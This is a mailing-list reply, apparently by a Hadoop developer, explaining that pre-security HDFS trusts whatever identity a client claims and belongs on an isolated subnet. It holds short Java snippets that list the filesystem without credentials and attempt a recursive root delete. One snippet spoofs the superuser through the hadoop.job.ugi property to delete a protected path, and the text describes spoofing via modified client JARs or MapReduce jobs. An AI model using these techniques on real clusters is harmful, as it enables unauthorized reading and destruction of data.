hmar...@umbc.edu wrote:
Steve,
Security through obscurity is always a good practice from a development
standpoint and one of the reasons why tricking you out is an easy task.
:)
My most recent presentation on HDFS clusters is now online; notice how it
doesn't gloss over the security:
http://www.slideshare.net/steve_l/hdfs-issues
Please, keep hiding relevant details from people in order to keep everyone
smiling.
HDFS is as secure as NFS: you are trusted to be who you say you are.
Which means that you have to run it on a secured subnet, with access
restricted to trusted hosts and/or one or two front-end servers, or accept
that your dataset is readable and writable by anyone on the network.
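
To make that concrete, here is a minimal sketch of what any process that
can reach the namenode's port can do, with no credentials at all; the
hostname and port are invented for illustration:

  import java.net.URI;
  import org.apache.hadoop.conf.Configuration;
  import org.apache.hadoop.fs.FileStatus;
  import org.apache.hadoop.fs.FileSystem;
  import org.apache.hadoop.fs.Path;

  public class NosyNeighbour {
    public static void main(String[] args) throws Exception {
      // No password, no token: point at the namenode and go.
      FileSystem fs = FileSystem.get(
          URI.create("hdfs://namenode.example.com:8020/"), new Configuration());
      for (FileStatus stat : fs.listStatus(new Path("/"))) {
        System.out.println(stat.getPath() + " owner=" + stat.getOwner());
      }
    }
  }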
There is user identification going in; it is currently at the level
where it will stop someone accidentally deleting the entire filesystem
if they lack the rights. Which has been known to happen.
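
That check is roughly at this level; a sketch only, using the same
invented namenode address as above:

  import java.net.URI;
  import org.apache.hadoop.conf.Configuration;
  import org.apache.hadoop.fs.FileSystem;
  import org.apache.hadoop.fs.Path;
  import org.apache.hadoop.security.AccessControlException;

  public class AccidentGuard {
    public static void main(String[] args) throws Exception {
      FileSystem fs = FileSystem.get(
          URI.create("hdfs://namenode.example.com:8020/"), new Configuration());
      try {
        fs.delete(new Path("/"), true); // recursive delete of the whole tree
      } catch (AccessControlException e) {
        // The accident the permission checks stop: the caller's
        // (self-reported) user lacks write access to "/".
        System.err.println("delete blocked: " + e.getMessage());
      }
    }
  }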
If the team looking after the cluster demands separate SSH keys/logins for
every machine, then not only are they driving their operations costs up,
it becomes moot once the HDFS cluster and MR engine are live. You can push
out work to the JobTracker, which then runs it on the machines under
whatever userid the TaskTrackers are running as. Hadoop 0.20+ will run it
under the identity of the user who claimed to be submitting the job;
without that, your MR jobs get the filesystem access rights of the user
running the TT.

It's also fairly straightforward to create a modified Hadoop client JAR
that doesn't call whoami to get the userid, and instead spoofs being
anyone. Which means that even if you lock down the filesystem (no
out-of-datacentre access), if I can run my Java code as MR jobs on your
cluster, I get unrestricted access to the filesystem by way of the
TaskTracker server.
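
One way to illustrate the same hole on a pre-security (0.20-era) cluster
is the client-side hadoop.job.ugi configuration property, which the old
client checks before falling back to whoami; a sketch, with the superuser
name and namenode address invented:

  import java.net.URI;
  import org.apache.hadoop.conf.Configuration;
  import org.apache.hadoop.fs.FileSystem;
  import org.apache.hadoop.fs.Path;

  public class Anyone {
    public static void main(String[] args) throws Exception {
      Configuration conf = new Configuration();
      // Pre-security clusters take the client's word for its identity:
      // claim to be the superuser and its group, no modified JAR needed.
      conf.set("hadoop.job.ugi", "hadoop,supergroup");
      FileSystem fs = FileSystem.get(
          URI.create("hdfs://namenode.example.com:8020/"), conf);
      fs.delete(new Path("/only-admins-should-touch-this"), true);
    }
  }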
But Hal, if you are running Ant for your build, I'm running my code on
your machines anyway, so you had better be glad that I'm not malicious.
-Steve